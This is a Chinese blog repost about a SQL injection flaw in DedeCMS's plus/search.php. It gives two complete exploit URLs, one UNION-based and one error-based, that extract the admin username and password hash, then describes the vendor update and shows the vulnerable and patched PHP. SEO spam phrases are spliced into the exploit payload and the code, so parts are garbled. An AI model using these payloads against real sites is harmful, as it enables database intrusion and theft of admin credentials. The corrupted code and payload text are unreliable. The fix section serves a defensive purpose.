dedecms plus/search.php注入漏洞修復及利用,dedecms
導讀:dedecmsdedecmsdedecms的最近出的一高危漏洞,search.php注入漏洞;估計現(xiàn)在很多黑闊都非常愛dedecms,因為經(jīng)常有各種漏洞爆出.很多利用起來也都很簡單. 下面織夢文章模板dede網(wǎng)站模板。
dedecms的最近出的一高危漏洞,search.php注入漏洞;估計現(xiàn)在很多黑闊都非常愛dedecms,因為經(jīng)常有各種漏洞爆出.很多利用起來也都很簡單.
下面是漏洞的詳細利用細節(jié):
0×1:
http://www.example.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
報錯如果為:Safe Alert: Request Error step 2 !
則利用以下exp:http://www.example.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
0×2:
http://www.example.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
報錯如果為:Safe Alert: Request Error step 1 !
則利用以下exp:http://www.example.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+informatio織夢后臺模板n_schema.tables+group+by+a)b)%23@`\'`+]=a
漏洞修復:
20130115常規(guī)安全更新include/arc.searchview.class.php, 搜索功能準確度優(yōu)化member/myfriend_group.php, 修復會員中心會員分組功能存在的安全隱患plus/search.php, 修復搜索功能存在的安全隱患
登錄DEDECMS后臺會有提示,更新即可。不過貌似官方?jīng)]有提供安全更新補丁的下載地址,找了半天沒找到~
漏洞分析:
存在漏洞的文件/plus/search.php
//引入欄目緩存并看關鍵字是否有相關欄目內容
require_once($typenameCacheFile);
if(isset($typeArr) && is_array($typeArr))
{
foreach($typeArr as dede模板安裝$id=>$typename)
{
$keywordn = str_replace($typename, ‘ ‘, $keyword);
if($keyword != $keywordn)
{
$keyword = $keywordn;
$typeid = $id; //對ID沒做任何過濾 導致注入
break;
}
}
}
}
$keyword = addslashes(cn_substr($keyword,30));
修復dede5.7模板之后
//引入欄目緩存并看關鍵字是否有相關欄目內容
require_once($typenameCacheFile);
if(isset($typeArr) && is_array($typeArr))
{
foreach($typeArr as $id=>$typename)
{
//$keywordn = str_replace($typename, ‘ ‘, $keyword);
$keywordn = $keyword;
if($keyword != $keywordn)
{
$keyword = HtmlReplace($keywordn);//防XSS
$typeid = intval($id); //強制轉換為數(shù)字型
break;
}
}
}
}
$keyword = addslashes(cn_substr($keyword,30));
相關織夢文章模板dede網(wǎng)站模板。聲明: 本文由我的SEOUC技術文章主頁發(fā)布于:2023-07-21 ,文章dedecms plus/search.php注入漏洞修復及利用,dedecms主要講述漏洞,標簽,dedecms網(wǎng)站建設源碼以及服務器配置搭建相關技術文章。轉載請保留鏈接: http://www.bifwcx.com/article/web_33074.html
為你推薦與dedecms plus/search.php注入漏洞修復及利用,dedecms相關的文章
-
dedecms首頁中文章列表無刷新頂、踩的實現(xiàn)
(120)人喜歡 2023-07-21 -
織夢網(wǎng)站地圖Sitemap+百度Ping推送功能實現(xiàn)
(160)人喜歡 2023-07-21 -
DeDecms后臺設置及網(wǎng)站地圖seo優(yōu)化,織夢技
(50)人喜歡 2023-07-21 -
DedeCMS模板制作自定義表單時添加驗證碼的
(166)人喜歡 2023-07-21 -
織夢標簽:sonchannel 子欄目調用,織夢教程
(103)人喜歡 2023-07-21 -
在織夢cms中使用繁體轉簡體的函數(shù)BIG5To
(186)人喜歡 2023-07-21
